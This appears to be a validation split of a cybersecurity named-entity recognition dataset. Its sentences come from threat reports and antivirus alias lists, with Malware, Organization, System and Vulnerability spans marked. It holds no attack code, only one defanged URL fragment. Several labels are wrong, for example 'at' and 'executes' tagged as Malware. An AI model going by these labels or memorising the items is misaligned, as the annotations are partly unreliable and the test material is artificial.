{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9999 Trojan.Win32.Dwn.dbqfdz Trojan.DownLoader11.6274 TR/Changeling.A.2686 Dropper/Win32.FrauDrop.R112106 Trojan.Barys.DC712 MSIL/TrojanDownloader.Small.HC Win32.Trojan.Changeling.Wwoe Trojan-Dropper.MSIL.Small MSIL/Small.HC!tr.dldr", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001296", "source": "cyner2_valid"}}
{"text": "The potential actor and who they target Our current analysis strongly suggests Desert Scorpion is being deployed in targeted attacks against Middle Eastern individuals of interest specifically those in Palestine and has also been highlighted by other researchers .", "spans": {"Malware: Desert Scorpion": [[79, 94]]}, "info": {"id": "cyner2_valid_001297", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Joke.Kazna JOKE_TRAIN.A Win32.Trojan.WisdomEyes.16070401.9500.9997 W32/Joke.BKPE-2551 Joke.Train Win32/Train.A!joke JOKE_TRAIN.A Win.Joke.Kazna-1 Joke.Kazna Hoax.Win32.BadJoke.Train Joke.Kazna Riskware.Win32.Train.hpzv Joke.Kazna ApplicUnsaf.Win32.Hoax.BadJoke.Train Joke.Kazna Trojan.DownLoader9.64121 Tool.BadJoke.Win32.974 BehavesLike.Win32.Trojan.xh W32/Joke.KW not-virus:Joke.Win32.Train HackTool[Hoax]/Win32.Train Joke.Kazna Hoax.W32.Badjoke!c Hoax.Win32.BadJoke.Train Unwanted/Win32.Xema.C67955 Joke.Kazna Win32/BadJoke.AZ not-a-virus:BadJoke.Win32.Train", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001298", "source": "cyner2_valid"}}
{"text": "Now , using these strings method1 can use reflection to call sendTextMessage and process the payment .", "spans": {}, "info": {"id": "cyner2_valid_001299", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: BKDR_ESCAD.SMHA Win32.Trojan.WisdomEyes.16070401.9500.9999 Backdoor.Destover BKDR_ESCAD.SMHA Backdoor.Win32.Escad.ax Trojan.Win32.Dllbot.40960.A BehavesLike.Win32.PWSYunsip.pm TR/NukeSped.ivjfp Trojan.Heur.LP.E1C304 Backdoor.Win32.Escad.ax Backdoor:Win32/Winsec.A!dha Trojan/Win32.Dllbot.R22672 Trj/GdSda.A W32/Destov.A!tr.bdr", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001300", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: TrojanDownloader.Muskmal Trojan.Downloader Trojan.Jacard.D49FE Win32.Trojan.WisdomEyes.16070401.9500.9845 Trojan.Win32.Z.Jacard.411648 Trojan.DownLoader19.54142 BehavesLike.Win32.Virut.gh W32/Trojan.KLTK-1753 TrojanDownloader:Win32/Muskmal.A Trj/GdSda.A Win32.Trojan.Crypt.Wlzh Trojan-Downloader.Win32.Banload W32/Banload.XAK!tr Win32/Trojan.8f4", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001301", "source": "cyner2_valid"}}
{"text": "No parties in Libya before this analysis reported to use cyber attacks, malwares nor recruit hackers to spy on their rivals.", "spans": {"Organization: parties": [[3, 10]], "Malware: cyber attacks, malwares": [[57, 80]], "Organization: rivals.": [[117, 124]]}, "info": {"id": "cyner2_valid_001302", "source": "cyner2_valid"}}
{"text": "ESET did not attribute the attacks to a particular attack group, but noted that the objective of the campaign was espionage and general information stealing.", "spans": {"Organization: ESET": [[0, 4]]}, "info": {"id": "cyner2_valid_001303", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Trojan.MSIL Trojan.MSILPerseus.D23447 Trojan.Win32.Spatet.exndob Trojan.DownLoader26.13037 Trojan.MSIL.ilbz TR/AD.Spatet.kaotz Trj/GdSda.A Trojan.MSIL.Crypt MSIL/Kryptik.MQL!tr Win32/Trojan.032", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001305", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9999 Trojan.Click.1210 W32/DL_small.BHK SScope.Trojan.Mezzia Win32/Trojan.73c", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001307", "source": "cyner2_valid"}}
{"text": "We are calling it HinataBot.", "spans": {"Organization: We": [[0, 2]], "Malware: HinataBot.": [[18, 28]]}, "info": {"id": "cyner2_valid_001308", "source": "cyner2_valid"}}
{"text": "Maliciously installed bitcoin miners", "spans": {"Malware: Maliciously": [[0, 11]], "Malware: bitcoin miners": [[22, 36]]}, "info": {"id": "cyner2_valid_001309", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Trojan.Golroted.A3 W32/Kolab.vky Trojan.MSIL.Krypt.11 Win32.Trojan.WisdomEyes.16070401.9500.9999 Trojan.Win32.Stealer.ewukig Trojan.PWS.Stealer.13025 BehavesLike.Win32.Trojan.cc Trojan.MSIL6 W32/Trojan.RRXG-8151 Trojan/MSIL.elex Trojan/MSIL.Inject Trojan.MSIL.Inject Trj/CI.A Win32/AutoRun.Delf.LV Win32.Worm.Autorun.Htvy MSIL/Injector.HTG!tr Win32/Trojan.7fd", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001310", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Trojan.Ranos.A Trojan.Razy.D20CA Win32.Trojan.WisdomEyes.16070401.9500.9999 BKDR_RANOS.SM1 Trojan.Win32.Disfa.cwbhis TrojWare.MSIL.TrojanDownloader.Small.DS Trojan.DownLoader9.7732 BKDR_RANOS.SM1 Trojan.MSIL2 TR/Fsysna.adkt Trojan/Win32.Llac.R121751 Backdoor.Bladabindi MSIL/Small.GJ!tr.dldr", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001311", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Win32.Frethem.I@mm Worm/W32.Frethem.35328 W32.Frethem.F Win32.Frethem.I@mm W32/Frethem.I@MM Win32.Frethem.E8D648 WORM_FRETHEM.F Win32.Trojan.WisdomEyes.16070401.9500.9982 W32/Frethem.JFVO-6973 W32.Frethem.I@mm Win32/Frethem.I WORM_FRETHEM.F Win.Exploit.IFrame-1 Win32.Frethem.I@mm Win32.Frethem.I@mm Trojan.Win32.Frethem.emoq I-Worm.Win32.NetSky.29184 W32.W.Frethem.f!c Win32.Frethem.I@mm Win32.Frethem.I@mm Win32.HLLM.Frethem.9 Worm.Frethem.Win32.5 BehavesLike.Win32.Dropper.nc Email-Worm.Win32.Brontok W32/Frethem.F Worm/Frethem.j WORM/Frethem.009 Worm[Email]/Win32.Frethem Worm:Win32/Frethem.H@mm Win32/Frethem.worm.35328.D W32/Frem.i@MM Worm.Frethem W32/Frethem.H Win32/Frethem.I Win32.Worm-email.Frethem.Eact I-Worm.Frethem!w9RyLJa8LZM W32/Frethem.fam@mm", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001312", "source": "cyner2_valid"}}
{"text": "This technique is employed by a Trojan downloader detected by Trend Micro as TROJ_POWHOV.A and P2KM_POWHOV.A, which we've uncovered in a recent spam email campaign in the EMEA region, especially organizations in the U.K., Poland, Netherlands, and Sweden.", "spans": {"Malware: a Trojan downloader": [[30, 49]], "Organization: Trend Micro": [[62, 73]], "Organization: organizations": [[195, 208]]}, "info": {"id": "cyner2_valid_001313", "source": "cyner2_valid"}}
{"text": "Both the Tibetan community and the Uyghurs, a Turkic Muslim minority residing primarily in northwest China, have been targets of multiple sophisticated attacks in the past decade.", "spans": {"Organization: Tibetan community": [[9, 26]], "Organization: the Uyghurs, a Turkic Muslim minority": [[31, 68]]}, "info": {"id": "cyner2_valid_001314", "source": "cyner2_valid"}}
{"text": "Emotet, a malicious group known as Moby Dick has returned to spamming operations after a months-long hiatus, and has switched to distributing malicious OneNote files.", "spans": {"Malware: Emotet,": [[0, 7]]}, "info": {"id": "cyner2_valid_001316", "source": "cyner2_valid"}}
{"text": "Employees at six Russian banks were sent spoofed emails delivering Trojan.Ratopak in a narrow, targeted attack.", "spans": {"Organization: Employees": [[0, 9]], "Malware: at": [[10, 12]], "Organization: Russian banks": [[17, 30]], "Malware: Trojan.Ratopak": [[67, 81]]}, "info": {"id": "cyner2_valid_001317", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: W32.OnGamesLT180912HKGHAAI.Trojan Trojan-GameThief.Win32.OnLineGames!O Downloader.Zlob.16943 Troj.GameThief.W32.Magania.l7ZW Win32.Trojan.WisdomEyes.16070401.9500.9907 W32/ZlobP.F TROJ_ZLOB.DQC Win.Downloader.Zlob-2167 Trojan-Downloader.Win32.Zlob.bcg Trojan.Win32.Zlob.bcayco Trojan.Popuper TROJ_ZLOB.DQC BehavesLike.Win32.PWSOnlineGames.lc W32/ZlobP.F TR/Dldr.Zlob.aaz.1 Trojan-Downloader.Win32.Zlob.bcg Win-Trojan/OnlineGameHack.B Trojan-Downloader.Win32.Revelation.Zlob", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001318", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Trojan/W32.KillAV.35840.AQ TrojanDropper.Dogkild.A4 Trojan.KillAV.Win32.1802 Troj.W32.KillAV.cpf!c Trojan/KillAV.cpf TROJ_KILLAV.ADU Trojan.KillAV TROJ_KILLAV.ADU Trojan.Win32.KillAV.vzmx Trojan.Win32.KillAV.35840.AZ TrojWare.Win32.Trojan.KillAV.~IY Trojan.AVKill.719 BehavesLike.Win32.Backdoor.nc TrojanDropper:Win32/Dogkild.C Trojan/Win32.KillAV.C646415 TScope.Malware-Cryptor.SB Win32.Trojan.Killav.Agbl Trojan.KillAV!4D1L18ztTpY Exploit.Win32.MS08067 W32/KillAV.CMO!tr", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001319", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: W32.DownloadSeaduke.Trojan Backdoor.Win32.Swrort!O Backdoor/Swrort.ob Python/Rozena.E BehavesLike.Win32.MultiPlug.wc Win32.Hack.Swrort.d.kcloud", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001320", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Backdoor/W32.Wisdoor.54784 Backdoor/Wisdoor.af BKDR_AOZ.A Win32.Trojan.WisdomEyes.16070401.9500.9793 W32/Wisdoor.KOGG-7396 BKDR_AOZ.A Backdoor.Win32.Wisdoor.bh Trojan.Win32.Wisdoor.elvp Win32.Backdoor.Wisdoor.Srwy Backdoor.Win32.Wisdoor.AF BackDoor.IRC.Wisdom BehavesLike.Win32.Fujacks.qc Backdoor.Win32.Wisdoor W32/Wisdoor.AY@bd Backdoor/Wisdoor.dz Trojan[Backdoor]/Win32.Wisdoor Backdoor:Win32/Wisdoor.CK Backdoor.W32.Wisdoor.af!c Backdoor.Win32.Wisdoor.bh Trojan/Win32.Wisdoor.R93697 Backdoor.Win32.Wisdoor.a Bck/Wisdoor.I Win32/Wisdoor.AF Backdoor.Wisdoor!KUkBN9ZhT8k", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001321", "source": "cyner2_valid"}}
{"text": "They provide users and administrators with the convenience of being able to take full control of their systems without needing to be physically in front of a device.", "spans": {"System: systems": [[103, 110]], "System: device.": [[158, 165]]}, "info": {"id": "cyner2_valid_001322", "source": "cyner2_valid"}}
{"text": "Since early 2015, FireEye Threat Intelligence has observed the significant growth of point-of-sale POS malware families in underground cyber crime forums.", "spans": {"Organization: FireEye Threat Intelligence": [[18, 45]], "Malware: point-of-sale POS malware families": [[85, 119]]}, "info": {"id": "cyner2_valid_001323", "source": "cyner2_valid"}}
{"text": "We have previously written about related activity in which a particular China-based attack group used PlugX and NetTraveler Trojans for espionage in Europe, Russia, Mongolia, Belarus, and other neighboring countries.", "spans": {"Malware: PlugX": [[102, 107]], "Malware: NetTraveler Trojans": [[112, 131]]}, "info": {"id": "cyner2_valid_001324", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: TROJ_PFINET.A Win32.Trojan.WisdomEyes.16070401.9500.9996 W64/Pfinet.A Backdoor.Pfinet Win32/Pfinet.A TROJ_PFINET.A W64/Pfinet.NCKD-3924 Backdoor:WinNT/Pfinet.B!dha Malware_fam.B Win32/Trojan.640", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001325", "source": "cyner2_valid"}}
{"text": "Despite Beijing's unwillingness to participate in the international arbitration and their rejection of the PCA's jurisdiction, there appears to be a distinct effort to surreptitiously target those who are interested in this landmark international legal case via electronic means.", "spans": {}, "info": {"id": "cyner2_valid_001326", "source": "cyner2_valid"}}
{"text": "The compromised devices are used to steal unencrypted network traffic and offer proxying services to the botnet operator.", "spans": {"Vulnerability: compromised devices": [[4, 23]]}, "info": {"id": "cyner2_valid_001327", "source": "cyner2_valid"}}
{"text": "The Android platform continues to be particularly susceptible, with one specific malware family called DressCode steadily and stealthily spreading since April before reports about it surfaced in August.", "spans": {"System: Android platform": [[4, 20]], "Malware: malware family": [[81, 95]], "Malware: DressCode": [[103, 112]]}, "info": {"id": "cyner2_valid_001329", "source": "cyner2_valid"}}
{"text": "We begin by reading news of an attack against the Taiwanese Government.", "spans": {"Organization: the Taiwanese Government.": [[46, 71]]}, "info": {"id": "cyner2_valid_001330", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9954 Trojan.Win32.Etchfro.czmvwf Trojan.Etchfro.3 Trojan:Win32/Etchfro.C Trojan.Win32.KillAV Win32/Trojan.Adware.37e", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001331", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9999 Backdoor.Trojan BKDR_BLADABI.SMC Hacktool.Msil.Flooder!c Backdoor.MSIL.Reomot.TG BKDR_BLADABI.SMC Trojan.MSIL.Spy W32/Trojan.XXTE-4287 BDS/Remote.kdia PWS:MSIL/Mintluks.A Trj/GdSda.A Msil.Hacktool.Flooder.Htwp MSIL/SpyPSW.AVQ!tr Win32/Trojan.Flooder.211", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001332", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Worm.Win32.AutoRun!O Worm.Autorun.j Worm.Win32.AutoRun W32/AutoRun.bbud Trojan.Buzy.440 Trojan.Win32.AutoRun.bpdmo Trojan.Minit Win32/AutoRun.ADR WORM_OTORUN.SML Worm.Autorun-1854 Worm.AutoRun!QjR+q9a4/Kw Worm.Win32.Autorun.192000.C[h] Worm:W32/Autorun.OY Worm.AutoRun.Win32.81931 WORM_OTORUN.SML W32/Autorun.worm.gr Worm/AutoRun.qcf WORM/Autorun.giqh Worm/Win32.AutoRun Worm.Autorun.kcloud Worm/Win32.AutoRun W32/Autorun.worm.gr Worm.Win32.AutoRun Worm.Win32.AutoRun W32/AutoRun.BDJ!tr W32/Autorun.KOF.worm", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001333", "source": "cyner2_valid"}}
{"text": "Figure 26 : the kill switch code snippet Evidence implies that the “ Agent Smith ” actor is currently laying the groundwork , increasing its Google Play penetration rate and waiting for the right timing to kick off attacks .", "spans": {"Malware: Agent Smith": [[69, 80]], "System: Google Play": [[141, 152]]}, "info": {"id": "cyner2_valid_001334", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Trojan.Scar Troj.W32.StartPage.lMKH Win32.Trojan.WisdomEyes.16070401.9500.9705 W32/Trojan.MRND-5328 Win32/CDoor.AD WORM_SCAR.DRDL Win32.Trojan.Scar.C Trojan.Win32.Scar.drdl Trojan.Win32.Scar.dctpie Trojan.Win32.Z.Scar.368640.I Trojan.MulDrop7.61859 Trojan.Scar.Win32.47893 WORM_SCAR.DRDL BehavesLike.Win32.BadFile.ft Worm.Win32.Yimper W32/Trojan2.NOIP Trojan/Scar.ajmz WORM/Yimper.rqfxr Trojan.Win32.Scar.drdl Trojan.Scar W32/Ircbot.DAC.worm I-Worm.Yimper.A Win32/Yimper.A Win32.Trojan.Scar.Ecuc Trojan.Scar!sMBz7qtKkGU W32/Scar.DRDL!worm", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001335", "source": "cyner2_valid"}}
{"text": "At least five different attacks were attributed to ITG03 actors, including a significant incident at the crypto exchange, Coincheck.", "spans": {"Organization: the crypto exchange, Coincheck.": [[101, 132]]}, "info": {"id": "cyner2_valid_001337", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: I-Worm.Golember.r6 Worm.Golember.Win32.35 Trojan/Golember.g Win32.HLLW.Rosya.D W32/Golember.G Win32/Rosya.D WORM_GOLEMBER.G IRC-Worm.Win32.Golember.g Trojan.Win32.Golember.emqh W32.W.Golember.g!c Worm.Win32.Rosya.D Win32.HLLW.Rosya.6 WORM_GOLEMBER.G BehavesLike.Win32.Dropper.pc W32/Golember.CCCT-0854 Worm/Sramota.agk W32/Golember.G Worm[IRC]/Win32.Golember Trojan.Heur.PT.cyWbbO2nkQh Trojan/Win32.OnlineGameHack Worm:Win32/Rosya.D Win32/Rosya.E IRC-Worm.Win32.Golember.g Worm/Rosya.F Worm.Win32.Golember.g", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001338", "source": "cyner2_valid"}}
{"text": "As Lookout first reported more than eight months ago , the problem with Shedun/HummingBad and similar malicious app families that silently exploit Android rooting vulnerabilities is that the infections can survive normal factory resets .", "spans": {"Organization: Lookout": [[3, 10]], "Malware: Shedun/HummingBad": [[72, 89]], "Vulnerability: Android rooting vulnerabilities": [[147, 178]]}, "info": {"id": "cyner2_valid_001340", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Trojan.ICKiller.A Trojan.Win32!O Trojan.ICKiller.A Win.Trojan.ICKiller-1 Trojan.ICKiller.A Trojan.Win32.ICKiller Trojan.ICKiller.A Trojan.Win32.ICKiller.bpcqy TrojWare.Win32.ICKiller._0 Trojan.ICKiller.A Trojan.ICKiller Trojan.ICKiller.Win32.1 W32/Trojan.YCCC-3040 Trojan/Win32.ICKiller Trojan.ICKiller.A Trojan.Win32.ICKiller Trojan.ICKiller.A Trj/CI.A Win32/Trojan.322", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001342", "source": "cyner2_valid"}}
{"text": "In this case, there is no malicious code in the attachment itself.", "spans": {"Malware: malicious code": [[26, 40]]}, "info": {"id": "cyner2_valid_001343", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9997 Trojan.DownLoad3.45983 HackTool:Win32/Uflooder.B!bit Backdoor/Win32.PcClient.R3680", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001344", "source": "cyner2_valid"}}
{"text": "Threat actors have delivered Bookworm as a payload in attacks on targets in Thailand.", "spans": {"Malware: Bookworm": [[29, 37]], "Malware: payload": [[43, 50]]}, "info": {"id": "cyner2_valid_001346", "source": "cyner2_valid"}}
{"text": "Once thought to be defunct, the resilient Pushdo has surfaced with infections observed in more", "spans": {"Malware: Pushdo": [[42, 48]]}, "info": {"id": "cyner2_valid_001347", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Trojan.KillHDD.A Trojan.KillHDD.A Trojan.KillHDD.A Trojan.KillHDD.A Trojan.Dos.KillHDD.flqn KillHDD.A Trojan.DOS-4 Trojan.DOS.KillHDD.a Dos.Trojan.Killhdd.Taew Trojan.KillHDD.A TrojWare.DOS.KillHDD.a Trojan.KillHDD.A Trojan.TestSpeed Trojan.KillHDD.DOS.5 Trojan/KillHdd.a TR/KillHDD.A W32/KillHDD.A!tr Trojan/DOS.KillHDD Trojan.KillHDD.A Troj.DOS.KillHDD.a!c Trojan.KillHDD.A Trojan.DOS.KillHDD.a", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001350", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: W32.MirolanG.Trojan TjnDownldr.Stocde.S16616 Win.Trojan.15532522-1 Trojan.Injector.Win32.358137 Trojan.Zusy.D2B3AD TrojanDownloader:Win32/Stocde.A!bit", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001351", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: W32/Packed_Upack.A Trojan.Crypt-41 Trojan-Spy.Win32.KeyLogger.cc Trojan.Zlob!IK Packed.Win32.MUPACK.~KW TrojanSpy.Keylogger.mn Packed.Win32.UPack PSW.Keylog.S Trj/Pupack.A", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001352", "source": "cyner2_valid"}}
{"text": "] com/ hxxp : //apple-icloud [ .", "spans": {}, "info": {"id": "cyner2_valid_001353", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Heur.Corrupt.PE TrojanDropper:Win32/OverJoiner.2_1.dam#2", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001354", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9911 Uds.Dangerousobject.Multi!c Trojan.MSIL.Spammer Spammer:MSIL/Misnt.A Trojan/Win32.Tepfer.R109904 Backdoor.Bot Trojan.Spammer!2GUbUR+Ce0w Trj/CI.A Win32/Trojan.Spammer.087", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001356", "source": "cyner2_valid"}}
{"text": "We've seen a plethora of threats that leverage malicious LNK files: from well-known ransomware families, backdoors typically deployed in targeted attacks, and banking Trojans to spam emails, even an exploit to a LNK vulnerability itself.", "spans": {"Malware: threats": [[25, 32]], "Malware: ransomware families, backdoors": [[84, 114]], "Malware: banking Trojans": [[159, 174]], "Malware: exploit": [[199, 206]], "Vulnerability: a LNK vulnerability itself.": [[210, 237]]}, "info": {"id": "cyner2_valid_001357", "source": "cyner2_valid"}}
{"text": "Although Ewind is fundamentally adware, monetization through displaying advertising on the victim device, it also includes other functionality such as collecting device data, and forwarding SMS messages to the attacker.", "spans": {"Malware: Ewind": [[9, 14]], "Malware: adware,": [[32, 39]], "System: victim device,": [[91, 105]]}, "info": {"id": "cyner2_valid_001358", "source": "cyner2_valid"}}
{"text": "The oldest app of the second campaign was last updated in April 2016 , meaning that the malicious code hid for a long time on the Play store undetected .", "spans": {"System: Play store": [[130, 140]]}, "info": {"id": "cyner2_valid_001359", "source": "cyner2_valid"}}
{"text": "From the outside , they are indistinguishable from the legitimate applications .", "spans": {}, "info": {"id": "cyner2_valid_001360", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Trojan:MSIL/DNSChanger.E", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001361", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: W32.HfsIemusi.27F7 Trojan/W32.Depok.467814 Virus.Win32.Sality!O Trojan.Depok.Win32.59 Win32.Trojan.WisdomEyes.16070401.9500.9968 Backdoor.Graybird Trojan.Win32.Havar.cvsjm Backdoor.W32.SdBot.leu6 Trojan.MulDrop5.4716 BehavesLike.Win32.FakeAlertSecurityTool.gc Trojan/Depok.aq Trojan/Win32.Depok TrojanDropper:Win32/Frovserp.B Trojan.Win32.Z.Packer.467814 Trojan/Win32.Depok.R90764 OScope.Trojan.Diple Trojan.Depok!RTDJO7TWHwY Trojan-Dropper.Delf Win32/Trojan.01f", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001362", "source": "cyner2_valid"}}
{"text": "Kaspersky Lab ICS CERT detected a targeted attack aimed at industrial organizations which began in August 2016 and is currently ongoing.", "spans": {"Organization: Kaspersky Lab ICS CERT": [[0, 22]], "Organization: industrial organizations": [[59, 83]]}, "info": {"id": "cyner2_valid_001363", "source": "cyner2_valid"}}
{"text": "To add more fuel to an existing fire, the sample was uploaded to VirusTotal from an IP address in Thailand a couple of minutes before the Bangkok Post newspaper reported the theft of 12 million baht from ATMs at banks in Thailand.", "spans": {"Organization: VirusTotal": [[65, 75]], "Organization: the Bangkok Post newspaper": [[134, 160]], "Organization: ATMs": [[204, 208]], "Organization: banks": [[212, 217]]}, "info": {"id": "cyner2_valid_001364", "source": "cyner2_valid"}}
{"text": "After a successful infection, RAA executes its main task, i.e. encrypts the user's files.", "spans": {"Malware: executes": [[34, 42]]}, "info": {"id": "cyner2_valid_001365", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Trojan.MSIL TROJ_PICIMGLOD.SM Trojan.Win32.Z.Taily.25600 TROJ_PICIMGLOD.SM TR/Downloader.lwzwe TrojanDownloader:MSIL/Taily.B!bit Trojan-Downloader.MSIL.Small Win32/Trojan.7c5", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001366", "source": "cyner2_valid"}}
{"text": "What ’ s more , the numbering of Asacub versions is a continuation of the Smaps system .", "spans": {"Malware: Asacub": [[33, 39]], "Malware: Smaps": [[74, 79]]}, "info": {"id": "cyner2_valid_001367", "source": "cyner2_valid"}}
{"text": "We found it to be installing bedep and vawtrak.", "spans": {"Malware: bedep": [[29, 34]], "Malware: vawtrak.": [[39, 47]]}, "info": {"id": "cyner2_valid_001368", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9998 BehavesLike.Win32.VirRansom.dc Trojan.Heur.E77EF0", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001369", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Backdoor/Alcodor.b Trojan.Heur.PT.EAD13BE Win32.Trojan.WisdomEyes.16070401.9500.9994 Backdoor.Win32.Alcodor.b Trojan.Win32.Alcodor.dbgk Backdoor.W32.Alcodor.b!c Win32.Backdoor.Alcodor.Hupm Backdoor.Win32.Alcodor.b BackDoor.Tsunami Backdoor.Alcodor.Win32.1 Backdoor.Win32.IRCBot Backdoor/Alcodor.a Trojan[Backdoor]/Win32.Alcodor Backdoor.Win32.Alcodor.b Backdoor.Alcodor Backdoor.Alcodor!NsO2/XMEkFE W32/Alcodor.B!tr Win32/Backdoor.db8", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001370", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Virus.Win32.Dropper Trojan.Adware.Symmi.D781 Trojan:Win32/Korad.C Adware/Win32.KorAd.R31907 Trojan.Downloader.86016 Adware.Kraddare!CwFWIAptaxs Win32/Trojan.Adware.6d7", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001371", "source": "cyner2_valid"}}
{"text": "Our findings from this new campaign include C2 infrastructure, new attack methods, four types of malware including Android malware, a system for management of stolen victim data and some detail of the actors.", "spans": {"System: C2 infrastructure,": [[44, 62]], "Malware: malware": [[97, 104]], "Malware: Android malware,": [[115, 131]], "System: system": [[134, 140]], "System: the actors.": [[197, 208]]}, "info": {"id": "cyner2_valid_001372", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Backdoor.Simhack.EX Backdoor.Simhack.EX Backdoor.Simhack.EX Backdoor.Simhack!OrBfM+IbJYI Backdoor.Trojan Backdoor.Simhack.EX Backdoor.Simhack.EX BDS/Simhack.EX Backdoor.Simhack.EX Backdoor.Simhack.EX W32/SIMHACK.EX!tr.bdr Win32/Backdoor.IM.624", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001373", "source": "cyner2_valid"}}
{"text": "Four of the exchanges that were attacked during this timeframe by ITG03 actors were located in South Korea; while this could simply be coincidence given South Korea's large cryptocurrency market, these campaigns against South Korean entities could have the added benefit of meeting ITG03's other motivation of exhibiting force to their enemies.", "spans": {"Organization: cryptocurrency market,": [[173, 195]]}, "info": {"id": "cyner2_valid_001374", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: W32.SysFileB.Trojan Trojan.Win32.VB!O Trojan.VB.Win32.19780 Trojan.Kazy.D7548 Win32.Trojan.VB.hd W32/Trojan2.ERGA Win32/Pacuks.A WORM_SILLY.CC Win.Trojan.VB-7031 Trojan.Win32.VB.evlkqz Trojan.Win32.VB.61699 TrojWare.Win32.Trojan.VB.~XX Trojan.MulDrop3.18059 WORM_SILLY.CC W32/Trojan.ISFS-8468 Trojan/VB.adk TR/VB.aop Trojan/Win32.VB Win32.Troj.VB.ao.kcloud Trojan/Win32.VB.R205901 Trojan.VBO.0441 Trojan.VB!yx+XlInqS1c Trojan.Win32.VB W32/VB.AOO!tr Win32/Trojan.16b", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001375", "source": "cyner2_valid"}}
{"text": "We have observed these new tools being used to target U.S.-based chain restaurants, although FIN7 has previously targeted hospitality organizations, retailers, merchant services, suppliers and others.", "spans": {"Malware: tools": [[27, 32]], "Organization: U.S.-based chain restaurants,": [[54, 83]], "Organization: hospitality organizations, retailers, merchant services, suppliers": [[122, 188]]}, "info": {"id": "cyner2_valid_001376", "source": "cyner2_valid"}}
{"text": "Based on this JSON reply , the app looks for an HTML snippet that corresponds to the active element ( show_hide btnnext ) and , if found , the Javascript snippet tries to perform a click ( ) method on it .", "spans": {}, "info": {"id": "cyner2_valid_001377", "source": "cyner2_valid"}}
